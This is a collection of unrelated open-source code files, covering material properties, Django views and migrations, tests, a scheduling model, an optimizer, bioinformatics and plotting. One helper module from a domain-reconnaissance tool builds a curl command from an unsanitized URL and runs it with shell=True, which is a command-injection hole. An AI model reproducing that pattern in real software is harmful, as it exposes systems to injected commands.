# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Magnesium.
"""
from armi.utils.units import C_TO_K
from armi.materials import material
class Magnesium(material.Fluid):
name = "Magnesium"
def setDefaultMassFracs(self):
self.setMassFrac("MG", 1.0)
def density(self, Tk=None, Tc=None):
r"""returns mass density of magnesium in g/cc
The Liquid Temperature Range, Density and Constants of Magnesium. <NAME>. Temple University 1961."""
        if not Tk and Tc:
            Tk = Tc + C_TO_K
        self.checkTempRange(923, 1390, Tk, "density")
        return 1.59 - 0.00026 * (Tk - 924.0)
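# Illustrative use (hypothetical values, not from ARMI's test suite): the
# correlation above gives roughly 1.57 g/cc at 1000 K.
#     mg = Magnesium()
#     mg.setDefaultMassFracs()
#     rho = mg.density(Tk=1000.0)   # 1.59 - 0.00026 * (1000 - 924) ~= 1.570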
|
contrib/integration/session/python/cppcmstest/tester/views.py
|
gatehouse/cppcms
| 388 |
118391
|
<gh_stars>100-1000
from django.http import HttpResponse
from django.conf import settings
import cppcms
#
# Create the session pool - note it is thread safe and should be one per projects
# Provide a path to configuration file
#
pool=cppcms.SessionPool(settings.BASE_DIR + '/config.js')
def bin2hex(val):
return ''.join('{:02x}'.format(x) for x in val)
def hex2bin(val):
return bytearray.fromhex(val)
def home(request):
session=pool.session()
session.load(django_request=request)
i = 0
output = []
while True:
i=i+1
id = "_" + str(i)
op_id = 'op' + id
key_id = 'key' + id
value_id = 'value' + id
print 'Checking ', op_id
if not op_id in request.GET:
break
op = request.GET[op_id]
if key_id in request.GET:
key = request.GET[key_id]
if value_id in request.GET:
value = request.GET[value_id]
result = 'ok'
if op=="is_set":
result = 'yes' if key in session else 'no'
elif op == "erase":
del session[key]
elif op == "clear":
session.clear();
elif op == "is_exposed":
result = 'yes' if session.get_exposed(key) else "no";
elif op == "expose":
session.set_exposed(key,int(value));
elif op == "get":
result = session[key];
elif op == "set":
session[key]=value;
elif op == "get_binary":
result = bin2hex(session.get_binary(key));
elif op == "set_binary":
session.set_binary(key,hex2bin(value));
elif op == "get_age":
result = str(session.get_age())
elif op == "set_age":
session.set_age(value)
print 'SET AGE DONE', value
elif op == "default_age":
session.default_age();
elif op == "get_expiration":
result = str(session.get_expiration())
elif op == "set_expiration":
session.set_expiration(int(value))
elif op == "default_expiration":
session.default_expiration();
elif op == "get_on_server":
result = 'yes' if session.get_on_server() else "no"
elif op == "set_on_server":
session.set_on_server(int(value))
elif op == "reset_session":
session.reset_session();
elif op == "csrf_token":
result = "t=" + session.csrf_token;
elif op == "keys":
ks=[]
for key in session.keys:
ks.append('[' + key + ']')
result = ','.join(ks)
else:
result = "invalid op=" + op;
msg = str(i) + ':' + result + ';'
print 'Res ' + msg
output.append(msg);
response = HttpResponse()
session.save(django_response=response)
response.write(''.join(output));
return response
|
InvenTree/stock/migrations/0024_auto_20200405_2239.py
|
ArakniD/InvenTree
| 656 |
118392
|
<gh_stars>100-1000
# Generated by Django 2.2.10 on 2020-04-05 22:39
import InvenTree.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stock', '0023_auto_20200318_1027'),
]
operations = [
migrations.AlterField(
model_name='stockitem',
name='URL',
field=InvenTree.fields.InvenTreeURLField(blank=True, help_text='Link to external URL', max_length=125),
),
]
|
gcp_variant_transforms/transforms/densify_variants_test.py
|
tsa87/gcp-variant-transforms
| 113 |
118431
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for densify_variants module."""
import unittest
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.transforms import Create
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.testing import asserts
from gcp_variant_transforms.testing.testdata_util import hash_name
from gcp_variant_transforms.transforms import densify_variants
class DensifyVariantsTest(unittest.TestCase):
"""Test cases for the ``DensifyVariants`` transform."""
def test_densify_variants_pipeline_no_calls(self):
variant_calls = [
vcfio.VariantCall(sample_id=hash_name('sample1')),
vcfio.VariantCall(sample_id=hash_name('sample2')),
vcfio.VariantCall(sample_id=hash_name('sample3')),
]
variants = [
vcfio.Variant(calls=[variant_calls[0], variant_calls[1]]),
vcfio.Variant(calls=[variant_calls[1], variant_calls[2]]),
]
pipeline = TestPipeline()
densified_variants = (
pipeline
| Create(variants)
| 'DensifyVariants' >> densify_variants.DensifyVariants([]))
assert_that(densified_variants, asserts.has_sample_ids([]))
pipeline.run()
def test_densify_variants_pipeline(self):
sample_ids = [hash_name('sample1'),
hash_name('sample2'),
hash_name('sample3')]
variant_calls = [
vcfio.VariantCall(sample_id=sample_ids[0]),
vcfio.VariantCall(sample_id=sample_ids[1]),
vcfio.VariantCall(sample_id=sample_ids[2]),
]
variants = [
vcfio.Variant(calls=[variant_calls[0], variant_calls[1]]),
vcfio.Variant(calls=[variant_calls[1], variant_calls[2]]),
]
pipeline = TestPipeline()
densified_variants = (
pipeline
| Create(variants)
| 'DensifyVariants' >> densify_variants.DensifyVariants(sample_ids))
assert_that(densified_variants, asserts.has_sample_ids(sample_ids))
pipeline.run()
|
cpmpy/building_a_house.py
|
tias/hakank
| 279 |
118464
|
<reponame>tias/hakank
"""
Building a house, simple scheduling problem in cpmpy.
This model is adapted from the OPL model sched_intro.mod (examples).
'''
This is a basic problem that involves building a house. The masonry,
roofing, painting, etc. must be scheduled. Some tasks must
necessarily take place before others, and these requirements are
expressed through precedence constraints.
'''
The OPL solution is
'''
Masonry : 0..35
Carpentry: 35..50
Plumbing : 35..75
Ceiling : 35..50
Roofing : 50..55
Painting : 50..60
Windows : 55..60
Facade : 75..85
Garden : 75..80
Moving : 85..90
'''
With the extra objective (from the OPL model sched_time.mod) the result is
masonry : [20 -- 35 --> 55]
carpentry: [75 -- 15 --> 90]
plumbing : [55 -- 40 --> 95]
ceiling : [75 -- 15 --> 90]
roofing : [90 -- 5 --> 95]
painting : [90 -- 10 --> 100]
windows : [95 -- 5 --> 100]
facade : [95 -- 10 --> 105]
garden : [95 -- 5 --> 100]
moving : [105 -- 5 --> 110]
This cpmpy model was written by <NAME> (<EMAIL>)
See also my cpmpy page: http://hakank.org/cpmpy/
"""
from cpmpy import *
import cpmpy.solvers
import numpy as np
from cpmpy_hakank import *
def prec(x, y, s, d):
"""
prec(x, y, s, d)
handle the precedences
the task x must be finished before task y begin
"""
return (s[x] + d[x] <= s[y])
def building_a_house(min_var="makespan"):
print("min_var :",min_var)
num_tasks = 10
# for the precedences
masonry,carpentry,plumbing,ceiling,roofing,painting,windows,facade,garden,moving = range(num_tasks)
tasks = [masonry,carpentry,plumbing,ceiling,roofing,painting,windows,facade,garden,moving]
tasks_s = ["masonry","carpentry","plumbing","ceiling","roofing","painting","windows","facade","garden","moving"]
duration = [35,15,40,15, 5,10, 5,10, 5, 5]
    height = [ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # resource
total_duration = sum(duration)
    # precedences
num_precedences = 14
precedences = [[masonry, carpentry],
[masonry, plumbing],
[masonry, ceiling],
[carpentry, roofing],
[ceiling, painting],
[roofing, windows],
[roofing, facade],
[plumbing, facade],
[roofing, garden],
[plumbing, garden],
[windows, moving],
[facade, moving],
[garden, moving],
[painting, moving]
]
# variables
start = intvar(0,total_duration,shape=num_tasks,name="start")
end = intvar(0,total_duration,shape=num_tasks,name="end")
limitx = intvar(1,3,name="limitx")
makespan = intvar(0,total_duration,name="makespan")
# the extra objective z (see above)
z = intvar(0, 10000,name="z")
# select which variable we should minimize: makespan or z
if min_var == "makespan":
min_val = makespan # (then we ignore the z part)
else:
min_val = z
model = Model(minimize=min_val)
# constraints
if min_val == z:
model += (z ==
400 * max([end[moving]- 100, 0]) +
200 * max([25 - start[masonry], 0]) +
300 * max([75 - start[carpentry], 0]) +
100 * max([75 - start[ceiling], 0]))
else:
model += (z == 0)
for t in range(num_tasks):
model += (end[t] == start[t] + duration[t])
# makespan is the end time of the last task
model += (makespan == max(end))
# precedences
for p in range(num_precedences):
model += (prec(precedences[p][0], precedences[p][1], start, duration))
model += (my_cumulative(start, duration, height, limitx))
ss = CPM_ortools(model)
if ss.solve():
print("min_val :", min_val.value())
print("makespan:", makespan.value())
print("z :", z.value())
print("start :", start.value())
print("duration:", duration )
print("height :", height)
print("end :", end.value())
for t in range(num_tasks):
print(f"{tasks_s[t]:10s}: {start[t].value():3d}..<{duration[t]:3d}>..{end[t].value():3d}")
print()
building_a_house("makespan")
building_a_house("z")
|
Python-3/basic_examples/strings/string_isidentifier.py
|
ghiloufibelgacem/jornaldev
| 1,139 |
118470
|
s = 'xyzABC'
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '0xyz' # identifier can't start with digits 0-9
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '' # identifier can't be empty string
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = '_xyz'
print(f'{s} is a valid identifier = {s.isidentifier()}')
s = 'ꝗꞨꫳ' # PEP-3131 introduced Non-ASCII characters to identifier list
print(f'{s} is a valid identifier = {s.isidentifier()}')
import unicodedata
count = 0
for codepoint in range(2 ** 16):
ch = chr(codepoint)
if ch.isidentifier():
print(u'{:04x}: {} ({})'.format(codepoint, ch, unicodedata.name(ch, 'UNNAMED')))
count = count + 1
print(f'Total Number of Identifier Unicode Characters = {count}')
|
fuxi/common/thirdparty/wydomain/common.py
|
cocobear/fuxi
| 731 |
118478
|
<filename>fuxi/common/thirdparty/wydomain/common.py
# encoding: utf-8
import re
from .config import *
import json
import subprocess
import logging
import requests as requests
import requests as __requests__
# from tldextract import extract, TLDExtract
from .utils.fileutils import FileUtils
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
if allow_http_session:
requests = requests.Session()
def is_domain(domain):
domain_regex = re.compile(
r'(?:[A-Z0-9_](?:[A-Z0-9-_]{0,247}[A-Z0-9])?\.)+(?:[A-Z]{2,6}|[A-Z0-9-]{2,}(?<!-))\Z',
re.IGNORECASE)
return True if domain_regex.match(domain) else False
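# Quick sanity check of the regex above (illustrative): is_domain("example.com")
# returns True, while is_domain("not a domain") returns False.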
def http_request_get(url, body_content_workflow=False, allow_redirects=allow_redirects, custom_cookie=""):
try:
if custom_cookie:
headers['Cookie']=custom_cookie
result = requests.get(url,
stream=body_content_workflow,
headers=headers,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
verify=allow_ssl_verify)
return result
except Exception as e:
# return empty requests object
return __requests__.models.Response()
def http_request_post(url, payload, body_content_workflow=False, allow_redirects=allow_redirects, custom_cookie=""):
""" payload = {'key1': 'value1', 'key2': 'value2'} """
try:
if custom_cookie:
headers['Cookie']=custom_cookie
result = requests.post(url,
data=payload,
headers=headers,
stream=body_content_workflow,
timeout=timeout,
proxies=proxies,
allow_redirects=allow_redirects,
verify=allow_ssl_verify)
return result
except Exception as e:
# return empty requests object
return __requests__.models.Response()
def curl_get_content(url):
try:
cmdline = 'curl "{url}"'.format(url=url)
logging.info("subprocess call curl: {}".format(url))
run_proc = subprocess.Popen(
cmdline,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(stdoutput,erroutput) = run_proc.communicate()
response = {
'resp': stdoutput.rstrip(),
'err': erroutput.rstrip(),
}
return response
except Exception as e:
pass
def save_result(filename, args):
    # use a context manager so the handle is always closed, even if open() fails
    with open(filename, 'w') as fd:
        json.dump(args, fd, indent=4)
def read_json(filename):
    if FileUtils.exists(filename):
        with open(filename, 'r') as fd:
            return json.load(fd)
    else:
        return []
|
autoPyTorch/utils/benchmarking/benchmark_pipeline/set_ensemble_config.py
|
mens-artis/Auto-PyTorch
| 1,657 |
118504
|
<filename>autoPyTorch/utils/benchmarking/benchmark_pipeline/set_ensemble_config.py
from hpbandster.core.result import logged_results_to_HBS_result
from autoPyTorch.pipeline.base.pipeline_node import PipelineNode
from autoPyTorch.utils.config.config_option import ConfigOption, to_bool
from autoPyTorch.utils.benchmarking.benchmark_pipeline.prepare_result_folder import get_run_result_dir
from copy import copy
import os
import logging
class SetEnsembleConfig(PipelineNode):
def fit(self, pipeline_config, autonet, run_result_dir):
parser = autonet.get_autonet_config_file_parser()
autonet_config = parser.read(os.path.join(run_result_dir, "autonet.config"))
if pipeline_config["ensemble_size"]:
autonet_config["ensemble_size"] = pipeline_config["ensemble_size"]
if pipeline_config["ensemble_only_consider_n_best"]:
autonet_config["ensemble_only_consider_n_best"] = pipeline_config["ensemble_only_consider_n_best"]
if pipeline_config["ensemble_sorted_initialization_n_best"]:
autonet_config["ensemble_sorted_initialization_n_best"] = pipeline_config["ensemble_sorted_initialization_n_best"]
autonet.autonet_config = autonet_config
return {"result_dir": run_result_dir,
"optimize_metric": autonet_config["optimize_metric"],
"trajectories": []}
def get_pipeline_config_options(self):
options = [
ConfigOption('ensemble_size', default=0, type=int),
ConfigOption('ensemble_only_consider_n_best', default=0, type=int),
ConfigOption('ensemble_sorted_initialization_n_best', default=0, type=int)
]
return options
|
orchestra/migrations/0082_task_tags.py
|
code-review-doctor/orchestra
| 444 |
118515
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-10-02 18:47
from __future__ import unicode_literals
from django.db import migrations
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0081_step_todolist_templates_to_apply'),
]
operations = [
migrations.AddField(
model_name='task',
name='tags',
field=jsonfield.fields.JSONField(default={'tags': []}),
),
]
|
test/programytest/parser/template/node_tests/test_conditiontype3.py
|
cdoebler1/AIML2
| 345 |
118558
|
<reponame>cdoebler1/AIML2<gh_stars>100-1000
from unittest.mock import patch
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.condition import TemplateConditionListItemNode
from programy.parser.template.nodes.condition import TemplateConditionNode
from programy.parser.template.nodes.condition import TemplateConditionVariable
from programy.parser.template.nodes.word import TemplateWordNode
from programytest.parser.base import ParserTestsBaseClass
class MyLoopTemplateConditionNode(TemplateConditionNode):
def __init__(self, name=None, value=None, var_type=TemplateConditionVariable.GLOBAL, loop=False, condition_type=TemplateConditionNode.BLOCK, next_value=None, next_value_step=0):
TemplateConditionNode.__init__(self, name, value, var_type, loop, condition_type)
self._next_step_count = 0
self._next_value = next_value
self._next_value_step = next_value_step
def _pre_default_loop_check(self, client_context):
self._next_step_count += 1
if self._next_step_count == self._next_value_step:
client_context.bot.get_conversation(client_context).set_property(self._next_value[0], self._next_value[1])
class TemplateConditionType3NodeTests(ParserTestsBaseClass):
def test_type3_node(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4")
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value1")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word1", result)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value2")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word3", result)
def test_type3_node_with_loop(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = MyLoopTemplateConditionNode(condition_type=3, next_value=('name1', "value1"), next_value_step=1)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4", loop=True) # Default Value
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value5")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("Word4 Word1", result)
def patch_resolve_type3_to_string(self, client_context):
raise Exception ("Mock Exception")
@patch("programy.parser.template.nodes.condition.TemplateConditionNode._resolve_type3_to_string", patch_resolve_type3_to_string)
def test_type3_exception(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL )
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond3 = TemplateConditionListItemNode(name="name3")
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
root.append(node)
self.assertEqual(len(root.children), 1)
self._client_context.bot.get_conversation(self._client_context).set_property('name1', "value1")
self._client_context.brain.properties.add_property('name3', "value3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
def test_type3_to_xml(self):
root = TemplateNode()
node = TemplateConditionNode(condition_type=3)
self.assertIsNotNone(node)
cond1 = TemplateConditionListItemNode(name="name1", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.GLOBAL)
cond1.append(TemplateWordNode("Word1"))
node.append(cond1)
cond2 = TemplateConditionListItemNode(name="name2", value=TemplateWordNode("value1"), var_type=TemplateConditionNode.LOCAL )
cond2.append(TemplateWordNode("Word2"))
node.append(cond2)
cond3 = TemplateConditionListItemNode(name="name3", value=TemplateWordNode("value3"), var_type=TemplateConditionNode.BOT )
cond3.append(TemplateWordNode("Word3"))
node.append(cond3)
cond4 = TemplateConditionListItemNode(name="name4")
cond4.append(TemplateWordNode("Word4"))
node.append(cond4)
root.append(node)
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><condition><li name="name1"><value>value1</value>Word1</li> <li var="name2"><value>value1</value>Word2</li> <li bot="name3"><value>value3</value>Word3</li> <li name="name4">Word4</li></condition></template>', xml_str)
|
opendeep/optimization/rmsprop.py
|
vitruvianscience/OpenDeep
| 252 |
118573
|
<gh_stars>100-1000
"""
Generic implementation of RMSProp training algorithm.
"""
# standard libraries
import logging
# third party libraries
import theano.tensor as T
from theano.compat.python2x import OrderedDict # use this compatibility OrderedDict
# internal references
from opendeep.utils.constructors import sharedX
from opendeep.optimization.optimizer import Optimizer
log = logging.getLogger(__name__)
# All RMSProp needs to do is implement the get_updates() method for stochastic gradient descent
class RMSProp(Optimizer):
"""
From Pylearn2 (https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/training_algorithms/learning_rule.py)
The RMSProp learning rule is described by Hinton in `lecture 6
<http://www.cs.toronto.edu/~tijmen/csc321/slides/lecture_slides_lec6.pdf>`
of the Coursera Neural Networks for Machine Learning course.
In short, Hinton suggests "[the] magnitude of the gradient can be very
different for different weights and can change during learning. This
makes it hard to choose a global learning rate." RMSProp solves this
problem by "[dividing] the learning rate for a weight by a running
average of the magnitudes of recent gradients for that weight."
"""
def __init__(self, dataset, loss, model=None,
epochs=10, batch_size=100, min_batch_size=1,
save_freq=None, stop_threshold=None, stop_patience=None,
learning_rate=1e-6, lr_decay=None, lr_decay_factor=None,
decay=0.95, max_scaling=1e5,
grad_clip=None, hard_clip=False):
"""
Initialize RMSProp.
Parameters
----------
dataset : Dataset
The :class:`opendeep.data.Dataset` to use when training the Model.
loss : Loss
The :class:`opendeep.optimization.loss.Loss` function to compare the model to a 'target' result.
model : Model
The :class:`opendeep.models.Model` to train. Needed if the Optimizer isn't being passed to a
Model's .train() method.
epochs : int
how many training iterations over the dataset to go.
batch_size : int
How many examples from the training dataset to use in parallel.
min_batch_size : int
The minimum number of examples required at a time (for things like time series, this would be > 1).
save_freq : int
How many epochs to train between each new save of the Model's parameters.
stop_threshold : float
The factor by how much the best validation training score needs to improve to determine early stopping.
stop_patience : int
The patience or number of epochs to wait after the stop_threshold has been reached before stopping.
learning_rate : float
The multiplicative amount to adjust parameters based on their gradient values.
lr_decay : str
The type of decay function to use for changing the learning rate over epochs. See
`opendeep.utils.decay` for options.
lr_decay_factor : float
The amount to use for the decay function when changing the learning rate over epochs. See
`opendeep.utils.decay` for its effect for given decay functions.
decay : float, optional
Decay constant similar to that used in AdaDelta and Momentum methods.
max_scaling: float, optional
Restrict the RMSProp gradient scaling coefficient to values
below `max_scaling`.
grad_clip : float, optional
Whether to clip gradients. This will clip with a maximum of grad_clip or the parameter norm.
hard_clip : bool
Whether to use a hard cutoff or rescaling for clipping gradients.
"""
# need to call the Optimizer constructor
initial_parameters = locals().copy()
initial_parameters.pop('self')
super(RMSProp, self).__init__(**initial_parameters)
assert max_scaling > 0., "Max_scaling needs to be > 0."
self.max_scaling = max_scaling
self.epsilon = 1. / self.max_scaling
self.decay = decay
self.mean_square_grads = OrderedDict()
def get_updates(self, gradients):
"""
Provides the symbolic (theano) description of the updates needed to
perform this learning rule. See Notes for side-effects.
Parameters
----------
gradients : dict
A dictionary mapping from the model's parameters to their
gradients.
Returns
-------
        updates : OrderedDict
A dictionary mapping from the old model parameters, to their new
values after a single iteration of the learning rule.
Notes
-----
This method has the side effect of storing the moving average
of the square gradient in `self.mean_square_grads`. This is
necessary in order for the monitoring channels to be able
to track the value of these moving averages.
Therefore, this method should only get called once for each
instance of RMSProp.
"""
log.debug('Setting up RMSProp for optimizer...')
updates = OrderedDict()
for param in gradients:
# mean_squared_grad := E[g^2]_{t-1}
mean_square_grad = sharedX(param.get_value() * 0.)
if param.name is None:
raise ValueError("Model parameters must be named.")
mean_square_grad.name = 'mean_square_grad_' + param.name
if param.name in self.mean_square_grads:
log.warning("Calling get_updates more than once on the "
"gradients of `%s` may make monitored values "
"incorrect." % param.name)
# Store variable in self.mean_square_grads for monitoring.
self.mean_square_grads[param.name] = mean_square_grad
# Accumulate gradient
new_mean_squared_grad = (self.decay * mean_square_grad +
(1 - self.decay) * T.sqr(gradients[param]))
# Compute update
scaled_lr = self.lr_scalers.get(param, 1.) * self.learning_rate
rms_grad_t = T.sqrt(new_mean_squared_grad)
rms_grad_t = T.maximum(rms_grad_t, self.epsilon)
delta_x_t = - scaled_lr * gradients[param] / rms_grad_t
# Apply update
updates[mean_square_grad] = new_mean_squared_grad
updates[param] = param + delta_x_t
return updates
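# For reference, the update computed above is, per parameter p with gradient g:
#     E[g^2]_t = decay * E[g^2]_{t-1} + (1 - decay) * g^2
#     p_t      = p_{t-1} - scaled_lr * g / max(sqrt(E[g^2]_t), epsilon)
# where epsilon = 1 / max_scaling bounds the gradient-scaling coefficient.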
|
positional_encodings/tf_positional_encodings.py
|
tatp22/multidim-positional-encoding
| 145 |
118578
|
import tensorflow as tf
import numpy as np
class TFPositionalEncoding2D(tf.keras.layers.Layer):
def __init__(self, channels:int, return_format:str="pos", dtype=tf.float32):
"""
Args:
channels int: The last dimension of the tensor you want to apply pos emb to.
Keyword Args:
return_format str: Return either the position encoding "pos" or the sum
of the inputs with the position encoding "sum". Default is "pos".
dtype: output type of the encodings. Default is "tf.float32".
"""
super(TFPositionalEncoding2D, self).__init__()
if return_format not in ["pos", "sum"]:
raise ValueError(f'"{return_format}" is an unkown return format. Value must be "pos" or "sum')
self.return_format = return_format
self.channels = int(2 * np.ceil(channels/4))
self.inv_freq = np.float32(1 / np.power(10000, np.arange(0, self.channels, 2) / np.float32(self.channels)))
@tf.function
def call(self, inputs):
"""
:param tensor: A 4d tensor of size (batch_size, x, y, ch)
:return: Positional Encoding Matrix of size (batch_size, x, y, ch)
"""
if len(inputs.shape)!=4:
raise RuntimeError("The input tensor has to be 4d!")
_, x, y, org_channels = inputs.shape
dtype = self.inv_freq.dtype
pos_x = tf.range(x, dtype=dtype)
pos_y = tf.range(y, dtype=dtype)
sin_inp_x = tf.einsum("i,j->ij", pos_x, self.inv_freq)
sin_inp_y = tf.einsum("i,j->ij", pos_y, self.inv_freq)
emb_x = tf.expand_dims(tf.concat((tf.sin(sin_inp_x), tf.cos(sin_inp_x)), -1),1)
emb_y = tf.expand_dims(tf.concat((tf.sin(sin_inp_y), tf.cos(sin_inp_y)), -1),0)
emb_x = tf.tile(emb_x, (1,y,1))
emb_y = tf.tile(emb_y, (x,1,1))
emb = tf.concat((emb_x, emb_y),-1)
pos_enc = tf.repeat(emb[None, :, :, :org_channels], tf.shape(inputs)[0], axis=0)
if self.return_format == "pos":
return pos_enc
elif self.return_format == "sum":
return inputs + pos_enc
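# Minimal usage sketch (shapes are illustrative assumptions):
#     layer = TFPositionalEncoding2D(channels=128)
#     feats = tf.zeros((4, 32, 32, 128))          # (batch, x, y, ch)
#     enc = layer(feats)                          # positional encodings only
#     summed = TFPositionalEncoding2D(128, return_format="sum")(feats)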
|
sandbox/jorvis/correct_RNAs_missing_genes.py
|
senjoro/biocode
| 355 |
118581
|
#!/usr/bin/env python3
"""
This housekeeping script reads a GFF3 file and writes a new one, adding a 'gene'
row for any RNA feature which doesn't have one. The coordinates of the RNA will
be copied.
The initial use-case here was a GFF file dumped from WebApollo which had this issue.
In this particular use case, the orphan mRNAs have ID attributes but no Parent,
though this is corrected.
INPUT EXAMPLE:
###
ChromosomeII_BmicrotiR1 IGS mRNA 1467897 1468187 . + . Name=ChromosomeII_BmicrotiR1:1467871-1468187;ID=101D714C468A44840D49A6FAAD27AFE5
ChromosomeII_BmicrotiR1 IGS exon 1467897 1468187 . + . Name=DE1443B2DABA5DEDBDEBE79EB433EEB8;Parent=101D714C468A44840D49A6FAAD27AFE5;ID=DE1443B2DABA5DEDBDEBE79EB433EEB8
ChromosomeII_BmicrotiR1 IGS CDS 1467897 1468187 . + 0 Name=101D714C468A44840D49A6FAAD27AFE5-CDS;Parent=101D714C468A44840D49A6FAAD27AFE5;ID=101D714C468A44840D49A6FAAD27AFE5-CDS
Author: <NAME>
"""
import argparse
from biocode import gff
def main():
parser = argparse.ArgumentParser( description='Adds gene features for RNAs which lack them')
## output file to be written
parser.add_argument('-i', '--input', type=str, required=True, help='Path to the input GFF3 file' )
parser.add_argument('-o', '--output', type=str, required=True, help='Output GFF3 file to write' )
args = parser.parse_args()
infile = open(args.input)
ofh = open(args.output, 'wt')
for line in infile:
if line.startswith('#'):
ofh.write(line)
continue
line = line.rstrip()
cols = line.split("\t")
if len(cols) != 9:
ofh.write("{0}\n".format(line) )
continue
id = gff.column_9_value(cols[8], 'ID')
parent = gff.column_9_value(cols[8], 'Parent')
if cols[2].endswith('RNA') and parent is None:
gene_cols = list(cols)
gene_cols[2] = 'gene'
gene_cols[8] = gff.set_column_9_value(gene_cols[8], 'ID', "{0}.gene".format(id))
ofh.write("{0}\n".format("\t".join(gene_cols)) )
cols[8] = gff.set_column_9_value(cols[8], 'Parent', "{0}.gene".format(id))
ofh.write("{0}\n".format("\t".join(cols)) )
else:
ofh.write("{0}\n".format(line) )
if __name__ == '__main__':
main()
|
tests/test_line.py
|
themiwi/ggplot
| 1,133 |
118617
|
<gh_stars>1000+
from ggplot import *
import pandas as pd
import numpy as np
import random
x = np.arange(100)
random.shuffle(x)
df = pd.DataFrame({
'x': x,
'y': np.arange(100)
})
print ggplot(df, aes(x='x', y='y')) + geom_line()
print ggplot(df, aes(x='x', y='y')) + geom_path()
|
chainercv/links/model/mobilenet/mobilenet_v2.py
|
Manny27nyc/chainercv
| 1,600 |
118652
|
<filename>chainercv/links/model/mobilenet/mobilenet_v2.py
import numpy as np
import chainer
from chainer.functions import average_pooling_2d
from chainer.functions import clipped_relu
from chainer.functions import softmax
from chainer.functions import squeeze
from chainercv.links.model.mobilenet.expanded_conv_2d import ExpandedConv2D
from chainercv.links.model.mobilenet.tf_conv_2d_bn_activ import TFConv2DBNActiv
from chainercv.links.model.mobilenet.tf_convolution_2d import TFConvolution2D
from chainercv.links.model.mobilenet.util import _make_divisible
from chainercv.links.model.mobilenet.util import expand_input_by_factor
from chainercv.links.model.pickable_sequential_chain import \
PickableSequentialChain
from chainercv import utils
"""
Implementation of Mobilenet V2, converting the weights from the pretrained
Tensorflow model from
https://github.com/tensorflow/models/tree/master/research/slim/nets/mobilenet
